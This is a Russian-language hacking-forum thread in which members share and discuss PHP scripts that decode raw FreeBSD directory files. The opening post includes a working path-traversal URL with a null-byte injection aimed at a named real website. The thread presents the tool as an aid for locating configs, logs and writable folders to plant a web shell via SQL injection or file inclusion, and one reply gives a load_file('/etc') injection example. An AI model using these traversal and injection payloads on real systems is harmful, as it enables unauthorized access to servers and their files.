скрипт для парсинга файлов каталогов

Discussion in 'Избранное' started by Scipio, 7 Dec 2007.

  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    скрипт для парсинга файлов каталогов,
    испытать его можно на gerz.ru:
    идем по ссылке:
    Code:
    http://www.gerz.ru/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/%00
    сохраняем полученную страницу на диск в папку со скриптом
    в строчке $fl=file_get_contents("file"); прописываем имя файла...

    как выяснилось на FreeBSD можно читать не только обычные файлы, но и файлы каталогов с помощью например комманды cat или средствами php

    скрипт бывает полезен, когда например есть sql инъекция с возможностью чтения файлов, то для того чтобы искать логи или конфиги апача, да даже для того чтоб найти путь к папкам доступным из веба, допустим для записи шелла, также при инклюдах (на Free BSD конечно же), вобщем must have, если сейчас не нужен, то пригодится позднее, также его несложно переделать под функцию и использовать в эксплоитах ;)

    PHP:
    <?php
    error_reporting
    (E_ALL);
    $fl=file_get_contents("file");
    $s=bin2hex ($fl);
    $ln=strlen($s)-5;
    $nam=FALSE;

    for (
    $i=0;$i<$ln;$i+=2)
       {
           
    $curhex=substr($s,$i,3);
           
    $nexthex=substr($s,$i+4,1);

           if ((
    $curhex=='040') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'[DIR] ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if ((
    $curhex=='080') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'[FILE] ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if (
    $nam===TRUE)

               {

                if ((
    $s[$i]>'1') and ($s[$i]<'8'))
                    {
                     
    $hx=substr($s,$i,2);
                  
    $hx=chr(hexdec($hx));
                  
    $pob=$pob.$hx;
                 }
             else {echo 
    $pob$nam=FALSE;}
            }


       }
    ?>
     
    16 people like this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    работает он так:

    в файле каталога я заметил такую особенность, перед именем файла или каталога идут два байта первый из них принимает значения или 04 или 08, второй байт везде не больше 15 в десятичной си т.е. в шестнадцатиричной си начинается на 0...

    так вот, если этот первый байт 04, то за этими двумя байтами идет имя каталога, а если 08, то это имя файла, насчет ссылок я не выяснил, но выяснить постараюсь...

    большая просьба к тем кто будет использовать скрипт, отписаться тут о его работе, меня смущает именно этот второй байт, может ли он принимать значения больше 0f, если всетаки может, то скрипт будет работать неправильно и не отображать некоторые имена
     
  3. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    219
    Likes Received:
    105
    Reputations:
    57
    помойму не только во FreeBSD, вроде во всех Unix like системах каталоги приедставлены в виде файлов(на счёт всех могу ошибаться).
    за скрипт +
    сам хотел как-нить подобный написать.
     
    #3 VampiRUS, 12 Dec 2007
    Last edited: 12 Dec 2007
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    да, ты прав, во всех Unix like системах каталоги приедставлены в виде файлов, но только во FreeBSD эти файлы можно читать с помощью ЯП или cat например, из всего что я пробовал это получается только во FreeBSD
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,313
    Likes Received:
    639
    Reputations:
    817
    Бред.
     
    1 person likes this.
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    В чем бред то?
     
  7. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    135
    Likes Received:
    134
    Reputations:
    91
    факт! нампример при sql-иньеции (os FreeBSD) можно прочитать содержимое директории через select null, null, null, load_file('/etc')....
     
  8. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    556
    Likes Received:
    298
    Reputations:
    207
    Хорошая штука, но что делать если выводится кроме файла каталога еще другая инфа?
     
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    Я не совсем понял о какой инфе ты говоришь, но если я правильно тебя понял, то эта инфа просто проигнорирует ся в большинстве случаев, так как там идет поиск по байтам со значением 04 и 08 и причем следующий байт после них должен тоже быть не больше 0Fh
     
  10. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    757
    Likes Received:
    336
    Reputations:
    215
    да куда проще было бы не "реверсить" и изучать устройство каталога, а просто выводить подстроки состоящие из печатаемых символов. просто возможен вариант, что к примеру атрибуты файла (права, время модификации и тп) представленные в бинарном виде, буду содержать то что ты ищешь и на что парсишь, хотя конечно врядли..

    >>да, ты прав, во всех Unix like системах каталоги приедставлены в виде файлов, но
    >>только во FreeBSD эти файлы можно читать с помощью ЯП или cat например, из
    >>всего что я пробовал это получается только во FreeBSD

    точно, просто фс'мы, например, linux'ов пишут в errno, при вызове open на каталог, ошибку EISDIR, этим они, мягко говоря, советуют пользоваться другими вызовами для работы с каталогами, странно почему в бсд это можно делать непосредственно..
     
    1 person likes this.
  11. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    Хм, насколько я знаю, что в файле каталога нет информации о правах доступа файлов которые в нем находятся,в нем имена и ссылки на физическое месторасположение (ну и еще что то).
    Насчет вывода подстрок из печатающих символов, тогда будет много мусора, потому что "служебные" байты принимают значения такие же как и печатаемые символы, если выделять подстроку как несколько подряд идущих петатаемых символов, то файлы и каталоги состоящие из одного символа выводиться не будут,к тому же не будет возможности определить является это файлом или каталогом.
    Насчет самого парсинга и поиска, я думаю, той ситуации которую ты описал не возникнет (я думал об этом). Там видишь какая фигня, сначала ищется байт со значением 04h или 08h проверяется следующий за ним байт, является ли он меньше 0Fh и идет проверка является ли идущий за этими двумя байтами байт печатаемым символом... надеюсь ты понял что я хотел сказать,а то я че то понаписал и сам не совсем понял:)
     
  12. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    757
    Likes Received:
    336
    Reputations:
    215
    >>Хм, насколько я знаю, что в файле каталога нет информации о правах доступа файлов
    >>которые в нем находятся,в нем имена и ссылки на физическое месторасположение (ну
    >>и еще что то).

    да, щас немного поэксперемнтировал с жесткими ссылками оказалось, что права приписываются непосредственно к идентификатору файла.

    >>Там видишь какая фигня, сначала ищется байт со значением 04h или 08h
    >>проверяется следующий за ним байт, является ли он меньше 0Fh и идет проверка
    >>является ли идущий за этими двумя байтами байт печатаемым символом...

    все-таки реверсить нужно:) я сейчас изучал методом тыка что пишется в каталог и оказалось, что там идет имя файла, его идентификатор, тип (обычный файл, каталог, символическая ссылка) и еще пара байт смысл которых мне пока не ясен, да и вообще не понятно зачем хранить тип файла когда это можно прикрепить непосредственно к inode.

    вот програмка производящая вроде бы грамотный парсинг http://zaco.info/bsdir.cpp
    интересно что идентификатор всегда выравнивается по машинному слову, а иногда программа выводит несуществующее файлы, причем идентификаторы которых, на первый взгляд вполне валидные.. я думаю определить удаленные файлы одним непосредственным парсингом каталога не удасться, нужно лезть в таблицу inode и смотреть есть ли там этот дескриптор или нет.

    вообще конечно жалко, что бсд позволяет выполнять вызов open только с флагом O_RDONLY, иначе можно было бы много пакостей наделать:)
     
    1 person likes this.
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    ZaCo, не плохо, очень не плохо... но согласись, мой вариант имееет возможность для большей реализации на практике, т.к. именно в инете это находит свое практическое применение, и согласись вариант на пхп именно этот имеет место быть, насчет ссылок, в конечном итоге, я тоже нашел, что байт 0Ah-это символическая ссылка, просто не стал включать в скрипт, потому что чем больше значений, тем больше вероятность неправильного парсинга... я вот немного тебя непонимаю, наверное ты просто не в той последовательности рассказал, но насколько я понял, что первые три байта дискриптора файла или каталога отвечают именно за физическое место расположения, и по закону жанра справа на лево... а вобще по идее респект тебе ZaCo, и уважуха, только ты меня по нормальному понял, и поэкспериментировал, т.е. занялся тем, чем занимался я до создания этого топика... но еще раз хочу сказать спасибо Macro, он профессионал, его стоит уважать
     
    #13 Scipio, 16 Dec 2007
    Last edited: 16 Dec 2007
  14. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    757
    Likes Received:
    336
    Reputations:
    215
    >>я вот немного тебя непонимаю, наверное ты просто не в той последовательности
    >>рассказал, но насколько я понял, что первые три байта дискриптора файла или
    >>каталога отвечают именно за физическое место расположения, и по закону жанра
    >>справа на лево...

    не совсем, идентификатор файл (он же дескриптор файла в файловой системе) это число, но само расположение файла, берется из таблицы inode (хотя по логике вещей это все-таки должно быть бинарное сбалансированное дерево для быстрого доступа к данным, просто так короче) ровно по этому идентификатору. а описание структуры содержимого каталога описано в struct DIR в bsdir.cpp. только нужно понимать, что все наши с тобой скрипты по-хорошему должны работать только в пределах одной фс ну или максимум совместимых.
    --
    и еще раз об выравнивании, если ты с++ не знаешь: сначала считывается структура DIR (inode - 4 байта, 2 байта не ясно чего, 1 байт - длина имени файла), далее само имя файла, а затем происходит скачок до ближайшего, кратного sizeof(int) (для gcc при стандартных настройках) адреса относительно начала данных.
     
    #14 ZaCo, 16 Dec 2007
    Last edited: 16 Dec 2007
  15. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    757
    Likes Received:
    336
    Reputations:
    215
    оказалось тут даже без выравнивание можно, заодно и смысл dontknow прояснился - длина текущего описания, в типе short int.
     
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    вот сделал поудобнее немного и сделал, чтоб он символические ссылки опознавал:
    PHP:
    <html>
    <head>
    <title>Парсинг каталогов FreeBSD от Scipio</title>
    </head>
    <body>
    <?php
    error_reporting
    (0);
    set_time_limit(0);
    if (isset(
    $_POST['pole'])){$pole=$_POST['pole']; $fl=file_get_contents($pole);} else $pole='';
    ?>
    <form method="post" action="<?=$_SERVER['SCRIPT_NAME']?>">
    <input type="text" size="150" name="pole" value="<?=$pole?>"/>
    </form>
    <?php
    if (!empty($fl))
    {
    $s=bin2hex ($fl);
    $ln=strlen($s)-5;
    $nam=FALSE;

    for (
    $i=0;$i<$ln;$i+=2)
       {       
    $curhex=substr($s,$i,3);
           
    $nexthex=substr($s,$i+4,1);

           if ((
    $curhex=='040') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'<b>[DIR]</b> ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if ((
    $curhex=='080') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'[FILE] ';
                
    $nam=TRUE;
                
    $i+=4;
               }

            if ((
    $curhex=='0a0') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'<i>[LINK]</i> ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if (
    $nam===TRUE)

               {

                if ((
    $s[$i]>'1') and ($s[$i]<'8'))
                    {
                     
    $hx=substr($s,$i,2);
                  
    $hx=chr(hexdec($hx));
                  
    $pob=$pob.$hx;
                 }
             else {echo 
    $pob$nam=FALSE;}
            }


       }

    }
    ?>
    </body>
    </html>
    в строку можно вводить как имя файла, так и сетевой адресс (строку URL) например URL с SQL-инъекцией, сам пользуюсь и много раз уже выручало
     
    1 person likes this.
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    Хм, скрипт показывает и недавно удаленные файлы, ответ на вопрос почему мне дал ZaCo:
    хотя об этом нетрудно догадаться, но все равно ему спасибо, другой вопрос как это можно использовать, жду предложений
     
  18. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    UPD: скрипт работает и для SunOS
     
    1 person likes this.
  19. HornetBlack

    HornetBlack Member

    Joined:
    28 Oct 2007
    Messages:
    27
    Likes Received:
    13
    Reputations:
    15
    За типом файла идет short int = длине имени. Я так понимаю, более ничего полезного из дампа каталога получить не удастся...
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    HornetBlack, а я так понимаю, ты хочешь минус получить. Прошло больше года =\. Это археология =\
     
Loading...